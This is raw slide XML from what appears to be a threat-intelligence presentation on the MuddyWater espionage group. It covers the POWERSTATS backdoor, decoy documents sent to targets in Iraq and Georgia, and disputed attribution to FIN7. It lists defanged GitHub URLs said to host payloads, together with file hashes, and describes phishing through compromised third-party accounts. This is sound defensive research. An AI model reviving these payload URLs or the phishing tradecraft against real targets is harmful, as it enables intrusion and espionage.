                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="407275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>May 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RFP.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Requirement.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq Kurdistan Regional Government</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Georgia</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Iraq</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mar 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>court.doc</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Georgia</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Feb 2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="800" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CERT-Audit-20172802-GEO.xls</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru" sz="800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Georgia</a:t>
                      </a:r>
                      <a:endParaRPr sz="800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="60000"/>
            <a:ext cx="9099900" cy="50220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91425" tIns="0" rIns="91425" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>All of these documents we observed and outlined above are related via:</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852"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Shared C2 infrastructure.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS).</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Shared attributes of the malicious documents used in attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Shared attributes as to how the documents were delivered.</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None/>
            </a:pP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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Based on these connections we can be confident that all the files and infrastructure we give in our appendices are related, since more than one of these can be used to link each of the samples discussed in each case.</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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>I download my tools from GitHub, and so do my victims.</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852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The tools used by the MuddyWater attackers have been well documented by the previously cited research and a common theme of previous reporting was the open source nature of much of the toolset used by MuddyWater: Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation etc.. In some of their recent attack documents, the attackers also used GitHub as a hosting site for their custom backdoor, POWERSTATS. Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s):</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>[unknown SHA256]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/ArabicBrowserFont.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>[unknown SHA256]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/FontArabic.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Downloads payload from: hxxps://raw.githubusercontent[.]com/ReactDeveloper2017/react/master/src/test/test.js</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None/>
            </a:pP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852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy. The POWERSTATS malware was compiled as an exe using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">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PS2EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. However, this was a minor anomaly, as it was only seen in this case: raw scripts being used in all other cases.</a:t>
            </a:r>
            <a:endParaRPr sz="12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5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="35325"/>
            <a:ext cx="8912300" cy="4217950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219025" y="4366325"/>
            <a:ext cx="8619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250" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker. Note that the username could be a small joke on the attackers’ part regarding the attribution to FIN7.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9114300" cy="50871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ru" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Pwn one to pwn them all</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In some of the instances we observed what appeared to be compromised accounts at third party organizations sending the malware. In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient. This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This targeting of third party organizations to attack further targets is a risky move on the attackers’ part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents</a:t>
            </a:r>
            <a:endParaRPr sz="85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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35325"/>
            <a:ext cx="9099900" cy="50730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r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Making sense of MuddyWater</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7. FIN7 is a threat actor group that is financially motivated with targets in the restaurant, services and financial sectors. Following the trail of existing public reporting, the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2, of a non-public tool “DNSMessenger”.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">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Morphisec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> wrote:</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
